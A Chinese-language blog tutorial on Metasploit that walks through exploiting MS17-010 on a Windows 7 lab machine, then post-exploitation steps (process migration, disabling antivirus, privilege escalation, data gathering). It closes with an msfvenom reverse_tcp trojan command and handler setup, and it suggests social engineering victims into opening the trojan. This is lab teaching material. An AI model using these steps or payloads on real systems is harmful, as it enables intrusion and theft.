• Metasploit介绍
  • 模块介绍
  • 渗透攻击步骤
  • 实战演练
    • 实验环境
    • 主机发现
    • 端口扫描
    • 检测漏洞是否存在
    • 后渗透攻击:信息收集
      • 必须知道的命令
      • 进程迁移
      • 系统命令
      • 文件系统命令
      • 网络命令
    • 后渗透攻击:权限提升
    • 后渗透攻击:信息窃取
  • 制作木马并监听

Metasploit介绍

渗透测试人员神器,骇客hack站的武器,涵盖渗透测试流程所用的模块

模块介绍

  1. Auxiliary(辅助模块)
    该模块不会直接在测试者和目标主机之间建立访问,他们只负责扫描、嗅探、指纹识别等相关功能以辅助渗透测试。
  2. Exploit(漏洞利用模块)
    利用系统、应用或服务中的安全漏洞进行攻击的模块。该模块存在各种POC(验证漏洞是否存在)、用于破坏系统安全性的攻击代码、每个漏洞对应的攻击代码(EXP)
  3. Payload(攻击载荷模块)
    目标系统在被渗透攻击之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码,添加用户账号,上传或下载文件等操作
  4. Post(后期渗透模块)
    取得目标系统远程控制器后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等
  5. Encoders(编码工具模块)
    负责木马免杀,以防止安全软件检测出来

渗透攻击步骤

  • 扫描目标机系统,寻找可用漏洞
  • 选择并配置一个漏洞利用模块(Exploit)
  • 选择并配置一个攻击载荷模块(Payload)
  • 选择一个编码技术,绕过杀软
  • 渗透攻击

实战演练

实验环境

windows7 靶机 ip 192.168.159.132
kali2021攻击机 ip 192.168.159.157

接下来windows7等着被渗透就ok
kali果断打开msf(建议以root身份打开


新版kali就是漂亮,我的博客里有新版kali教程可以去看看

主机发现

从现在开始,如果目标有足够的安全防护能力,那么你的一举一动可能会被对方掌握得清清楚楚,如果渗透测试需要隐秘进行,每个步骤要足够小心才是,这篇文章不讲解隐秘方法

一开始先发现有什么主机在线

  • 方法一

nmap -sn只进行主机发现,不进行端口扫描

发现了4个主机在线,其中一个虚拟网卡1,一个虚拟网卡8,一台kali,一台win7

  • 方法二
    msf的scanner/discovery

端口扫描

  • 方法一
    nmap -O 扫描出操作系统信息和开启的端口( -Pn 参数不使用ping方式,可以避免被防火墙发现),这里扫出多个操作系统信息,不急,往下看

    nmap -sV 选项可以对目标开启的服务及版本进行探测,结合-O选项基本可以锁定目标操作系统的类型和版本,因为有的服务版本只在特定的操作系统上运行

  • 辅助模块smb扫描得知操作系统版本


  • 方法二
    msf的scanner/portscan
    这里使用syn扫描,这种方式速度快且不容易被发现

    扫出了几个,但是速度还是没有nmap快

检测漏洞是否存在

很多网络服务是漏洞频发的高危对象,刚刚已经知道目标开启的服务,通过对服务信息进入更深入的挖掘,通常称为服务查点

  • nmap扫描
  • 这里网络换了一下,只要用–script vuln 扫就行

    扫出一个ms17010漏洞
  • 手动检测

看到主机开启了445端口,而这个端口也是SMB协议默认运行的端口,大多数攻击都是通过SMB服务做跳板进行MSRPC(ms远程过程调用)来对其他windows本地服务漏洞实施渗透攻击的

先查看smb版本

可以看到SMB版本和操作系统的版本

接下来搜索smb的攻击模块,并使用其中之一进行渗透攻击。模块详细信息可以use之后,show info查看

这里使用最常用的一个ms17-010
他这里已经帮我们设置好默认payload–meterpreter了,kali版本低可能要自己set payload

设置好参数,运行,成功拿shell

查看当前权限,system最高权限

后渗透攻击:信息收集

必须知道的命令

  • 查看当前用户

    直接是system最高权限用户,不用再利用其他漏洞提权了

在Windows操作系统中
1.普通权限 默认情况下,系统为用户分了7个组管理员组(Administrators)、高权限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制组(Replicator)、来宾用户组(Guests),已认证用户组(Ahthenticated users) 其中备份操作组和文件复制组为维护系统而设置,平时不会被使用系统默认的分组是依照一定的管理凭据指派权限的,而不是胡乱产生,管理员组拥有大部分的计算机操作权限(并不是全部),能够随意修改删除所有文件和修改系统设置只有程序信任组(特殊权限)。普通用户组则被系统拴在了自己的地盘里,不能处理其他用户的文件和运行涉及管理的程序等。来宾用户组的文件操作权限和普通用户组一样,但是无法执行更多的程序。
2.特殊权限 除了上面提到的7个默认权限分组,系统还存在一些特殊权限成员,这些成员是为了特殊用途而设置 分别是:SYSTEM(系统)、Trustedinstaller(受信任程序)、Everyone(任何人)、CREATOR OWNER(创建者) 等 这些特殊成员不被任何内置用户组吸纳,属于完全独立出来的账户真正拥有“完全访问权”的只有一个成员:SYSTEM。.

  • session放在后台
  • 查看会话
  • 选择会话
  • 获得系统的控制台shell

进程迁移

在刚获得shell的时候,该shell是非常脆弱的,一步小心就会被用户关闭,所以第一步要移动这个shell

  • 查看meterpreter进程号
  • 输入ps 查看全部进程,找到后门PID
  • 把进程迁移到explorer.exe(2396),因为它是个稳定的进程

    迁移成功

    原来的PID会自动关闭,如果没有 kill PID

系统命令

  • 查看系统信息

  • 查看正在运行的进程

  • execute命令
    执行可执行文件,可以执行自己生成的木马

  • 交互型shell

    解决乱码
    chcp 65001

    退出shell

  • 查看是否为虚拟机

  • 关闭杀毒软件

  • 启动远程桌面

  • 查看打了什么补丁
    现在已经拿到一个shell,想进一步提权,要查看有哪些漏洞可以提权

use post/windows/gather/enum_patches

还有很多请读者自行了解

文件系统命令

  • 查看当前目录

  • 查看当前目录内容
    dir

  • 切换目录

  • 查找文件
    -f搜索指定文件名 -d指定在哪个目录下搜索

  • 编辑文件
    可以调用vi编辑器

  • 下载文件

  • 上传文件

    不知道我的权限是怎么降下来的,上传文件到C盘失败

网络命令

  • 查看路由表

  • 查看网卡信息
    ipconfig

后渗透攻击:权限提升

  • meterpreter的getsystem


    具体原理看下面连接

https://docs.rapid7.com/metasploit/meterpreter-getsystem

  • 利用wmic漏洞提权

wmic是一款命令行管理工具,详情去百度

它的漏洞编号ms16-032

设置参数session,首先查看普通权限的sessionid,这里是2

  • 这里测试结果有点出乎意料,等我想通再来wp哈

后渗透攻击:信息窃取

msf gather(信息搜集)路径下有很多强大的信息收集模块

  • 获得目标主机最近进行的系统操作、访问文件和文档操作记录
    dumplinks
  • 获知目标主机安装的软件,安全更新与漏洞补丁信息

制作木马并监听

生成木马,可以通过webshell上传到目的主机中,也可以通过社工让受害人点开

msfvenom -p windows/meterpreter/reverse_tcp lhost=... lport=... -f exe -o 储存的位置

监听木马,等待着受害人打开木马

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Metasploit基础相关推荐

  1. Metasploit基础和基本命令详解

    Metasploit基础 2003年H.D Moore创建了Metasploit,从那之后Metasploit便快速发展起来,如今被公认为最为流行的渗透测试工具之一.Metasploit是一个完全的R ...

  2. metasploit基础命令介绍

    web安全学习了解:web渗透测试 官网:metasploit基础命令介绍 六个模块:   一.渗透攻击模块(exploit):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击的代码 (1)主动渗透 ...

  3. 1、metasploit基础知识(笔记)

    文章目录 什么是exp? 什么是payload? 总结理解 MSF(metasploit framework)使用 进入MSF 设置监听 生成木马文件 木马上线 相关参数说明 扩展 什么是exp? 渗 ...

  4. Metasploit 基础

    一.模块 1.Auxiliary(辅助模块) 不会直接在测试者和目标主机之间建立访问,只负责执行扫描.嗅探.指纹识别等相关功能以辅助渗透测试 2.Exploit(漏洞利用模块) 漏洞利用是指由渗透测试 ...

  5. metasploit基础命令操作

    参考:https://longwaer.blog.csdn.net/article/details/122745903 – Exploit,攻击工具/代码 – Payload,攻击载荷 – Shell ...

  6. [系统安全] 四十四.APT系列(9)Metasploit技术之基础用法万字详解及防御机理

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  7. [网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及防御机理

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  8. Metasploit技术(一)——Metasploit简介与基础

    目录 一.Metasploit简介 二.Metasploit基础 2.1 专业术语 2.2 渗透攻击步骤 一.Metasploit简介   Metasploit是当前信息安全与渗透测试领域最流行的术语 ...

  9. 第四期_Metasploit 基础(六)Meterprete《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》

    翻译者说明1:本文为Metasploit Unleashed中文版翻译.原文链接:https://www.offensive-security.com/metasploit-unleashed/ 翻译 ...

最新文章

  1. 我开发共享软件的三次经历(中):我赚到了十万块
  2. #数据集#:并发脑电图、心电图和多剂量经颅电刺激行为的数据集
  3. JSP+JavaBean+Servlet工作原理实例…
  4. php和html和javascript,php和javascript区别有哪些
  5. java 8 lambda sort_Java8 用Lambda表达式给List集合排序的实现|chu
  6. CentOS 7从Python 2.7升级至Python3.6.1
  7. 统计分组的原则是要体现什么_什么样的卖场原则更能体现商业设计的价值!
  8. 电子设计竞赛电源题(2)-检波与采样
  9. 实验2 SQL Server 表操作
  10. 数据库实例:用户登录
  11. 小型机oracle命令,IBM 小型机基本知识及AIX操作系统基本命令.doc
  12. 学会智能标注与海量复杂文本分类
  13. SQL Server-【知识与实战II】条件查询、比较运算符查询、模糊查询、枚举查询、范围查询、空值查询、多重条件查询
  14. APP 代码提交GitHub: 提交、合并与冲突解决 (终端操作语法)
  15. synchronized工作原理剖析(二)
  16. Code-NFine:jqgrid 数据绑定
  17. CGAL预定义内核转换的问题
  18. 张江男曲折的出国梦_IT新闻_博客园
  19. 泰山OFFICE技术讲座:英寸,厘米,磅,派卡,提,行,字行,像素的换算关系
  20. android分辨率2k3k4k,android 不同分辨率适配

热门文章

  1. 消除疑虑:一切假大空都是纸老虎
  2. Android包管理机制5 APK是如何被解析的
  3. abap基础表之间的联系
  4. 新发传染病与公共安全答案(慕课网)课堂测试3-8
  5. java 固定电话_Java正则表达式验证固定电话号码符合性
  6. 湖畔大学教育长曾鸣,给00后的建议
  7. win11新版本微信消息不闪烁/提示问题
  8. 【ESP32】1.Arduino IDE 2.0安装详解
  9. Photoshop安装问题:106 无法写入注册表
  10. halcon拓展系列—延伸直线段算子gen_segment_extend